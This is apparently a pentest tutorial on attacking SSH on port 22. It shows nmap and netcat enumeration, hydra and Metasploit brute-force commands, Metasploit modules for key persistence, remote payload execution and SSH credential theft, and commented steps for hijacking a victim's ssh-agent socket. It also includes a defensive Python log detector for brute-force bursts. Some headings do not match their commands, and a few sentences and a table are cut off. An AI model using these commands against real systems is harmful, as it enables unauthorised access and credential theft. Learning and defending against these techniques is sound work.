Welcome, today I am writing about SSH penetration testing fundamentals, describing port 22 vulnerabilities. SSH security is one of the topics we all need to understand: remote access services can be an entry point for malicious actors when they are configured improperly.
Understand SSH Protocol
Understanding how SSH works is out of scope; here I assume you are already familiar with the service and with how it can be configured on a Linux host.
Some things to remember: SSH works on port 22 by default and uses a client-server architecture, and it is used to access remote hosts securely.
SSH can implement different types of authentication, and each one of them has its own security weaknesses, so keep that in mind! One of the most used methods to authenticate is RSA keys, relying on public-key infrastructure. Another great feature is the possibility to create encrypted tunnels between machines or to forward ports for local or remote services; as pentesters we can use it to pivot inside the network under the radar, since SSH is a well-known tool for sysadmins.
Read more about Pivoting using SSH
SSH Penetration Testing
OK, let's talk about how to pentest SSH. As you know, it all starts with enumeration; we can use some tools to do all the work for us or we can do it manually.
Some questions to ask before we start enumerating:
- Is there any SSH server running?
- On what Port?
- What version is running?
- Any Exploit to that version?
- What authentication type is used? Passwords / RSA Keys
- Is it blocking brute force?
After we have all the answers we can start thinking about what to do. If we don't have any information about users or passwords/keys yet, it is better to search for an exploit; unfortunately, SSH exploits are rare. Search my website to see if there are any exploits.
Damn it, we are stuck :/
It's time to go and enumerate other services and try to find something that can be used, like usernames or RSA keys; remember, keys usually have the username at the bottom.
Assuming we found one or more usernames, we can try to brute-force the service using a good wordlist, or, if we were lucky and found an RSA key with a username, We Are In!
Haha is not so easy, but OK, we are learning…
SSH Client Interesting Files
SSH client configuration file, this file can be used
Default folder containing RSA Keys
cd ~/.ssh
cd /home/rfs/.ssh
After we scan a network and identify port 22 open on a remote host, we need to identify which SSH service is running and which version; for that we can use Nmap.
nmap -sV -p22 192.168.1.96
SSH Banner Grabber
Banner grabbing is an easy technique but can help us a lot: we can verify what service version is running on the remote server and try to find a CVE related to it.
nc 192.168.1.96 22
ssh -v 192.168.1.96
| SSH Servers List | Website |
| --- | --- |
| Cisco SSH Server | |
Attack SSH port 22
At this point we only know what service is running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1). Assuming we have found the username msfadmin, we will try to brute-force his password using hydra.
Bruteforce SSH Service
hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run
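On the defending side, a hydra or ssh_login run like the ones above leaves a very recognisable burst in sshd's log. The following is an added example, not part of the original post: a Python detector run over constructed /var/log/auth.log lines (hostname, PIDs, addresses and timestamps are made up) that flags a source address exceeding a threshold of failed logins inside a sliding window and records a later successful login from that address as a likely compromise.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd auth lines relevant here, in the syslog format written to /var/log/auth.log (no year).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text):
    """Yield (ts, result, method, user, ip) per matching line; year-less timestamps parse as 1900, only deltas are used."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["method"], m["user"], m["ip"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window_s-second window.
    An 'Accepted' from an already flagged IP is recorded as a likely compromise."""
    recent = defaultdict(deque)  # ip -> deque of (timestamp, user) failures still inside the window
    alerts = {}
    for ts, result, method, user, ip in parse_auth_log(text):
        if result == "Failed":
            q = recent[ip]
            q.append((ts, user))
            while (ts - q[0][0]).total_seconds() > window_s:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(), "compromised": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(u for _, u in q)
        elif ip in alerts:  # result == "Accepted" from an address that already tripped the threshold
            alerts[ip]["compromised"] = (user, method)
    return alerts
# Constructed sample of auth.log lines: a hydra-style burst against msfadmin from
# 192.168.1.50 that ends in a successful login, plus unrelated benign activity.
SAMPLE_LOG = """\
Mar  3 10:15:01 target sshd[2201]: Failed password for msfadmin from 192.168.1.50 port 51234 ssh2
Mar  3 10:15:01 target sshd[2203]: Failed password for msfadmin from 192.168.1.50 port 51235 ssh2
Mar  3 10:15:02 target sshd[2205]: Failed password for msfadmin from 192.168.1.50 port 51236 ssh2
Mar  3 10:15:02 target sshd[2207]: Failed password for msfadmin from 192.168.1.50 port 51237 ssh2
Mar  3 10:15:03 target sshd[2209]: Failed password for msfadmin from 192.168.1.50 port 51238 ssh2
Mar  3 10:15:04 target sshd[2211]: Accepted password for msfadmin from 192.168.1.50 port 51239 ssh2
Mar  3 11:40:12 target sshd[2300]: Failed password for invalid user admin from 192.168.1.77 port 40001 ssh2
Mar  3 11:41:20 target sshd[2310]: Accepted publickey for rfs from 192.168.1.10 port 40002 ssh2: RSA SHA256:abc
"""
```

Calling detect_bruteforce(SAMPLE_LOG) flags only 192.168.1.50, with five failures and a password compromise of msfadmin; a tool such as fail2ban applies the same idea, so the answer to "Is it blocking brute force?" is visible from the source's side as attempts that stop connecting after a few failures.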
Crack SSH Private Keys
use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit
SSH User Code Execution
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username ignite
msf exploit(sshexec) > set password 123
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit
Steal SSH credentials
If we have a Meterpreter shell, we can use the post-exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.
use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit
# Attacker finds the sshd process of the victim
ps aux | grep sshd
# Attacker looks for SSH_AUTH_SOCK in the victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
# Attacker hijacks the victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
# Attacker can now log in to remote systems as the victim
ssh remote_system -l victim
Working with RSA Keys